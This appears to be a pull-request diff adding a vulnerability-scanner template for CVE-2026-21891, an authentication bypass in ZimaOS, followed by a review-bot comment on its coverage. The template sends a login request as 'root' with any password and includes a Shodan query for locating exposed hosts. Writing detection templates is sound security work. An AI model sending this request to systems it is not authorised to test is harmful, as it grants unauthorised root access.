64 changes: 64 additions & 0 deletions http/cves/2026/CVE-2026-21891.yaml
@@ -0,0 +1,64 @@
id: CVE-2026-21891

info:
name: ZimaOS - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
impact: |
Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
remediation: |
Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
reference:
- https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
- https://nvd.nist.gov/vuln/detail/CVE-2026-21891
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score: 9.4
cve-id: CVE-2026-21891
cwe-id: CWE-287
epss-score: 0.00059
epss-percentile: 0.18386
cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"ZimaOS"
product: zimaos
vendor: zimaspace
tags: cve,cve2026,zimaos,auth-bypass,broken-auth

http:
- raw:
- |
POST /v1/users/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/

{
"username": "root",
"password": "anything"
}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "success"
- "username"
- "created_at"
condition: and

- type: word
part: content_type
words:
- "application/json"

- type: status
status:
- 200
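Review bot: the request at `POST /v1/users/login` probes only the `root` account, yet the description says the flaw affects known system service accounts generally and that exploitation requires knowledge of common usernames, so a negative result from this single probe does not rule out other affected accounts; either state in the description why `root` alone is sufficient for detection, or make `username` a payload list so the template covers the other service accounts the advisory has in mind. The body matcher (`"success"`, `"username"`, `"created_at"` with `condition: and`) matches key presence only, so a JSON error response that echoes the submitted username and carries a `success` field set to false could still satisfy it; anchoring on the success value rather than the bare word would tighten it, if the API returns one. Minor style point: the last clause of `description` ("..., exploit requires knowledge of common usernames.") is a run-on and reads better as its own sentence.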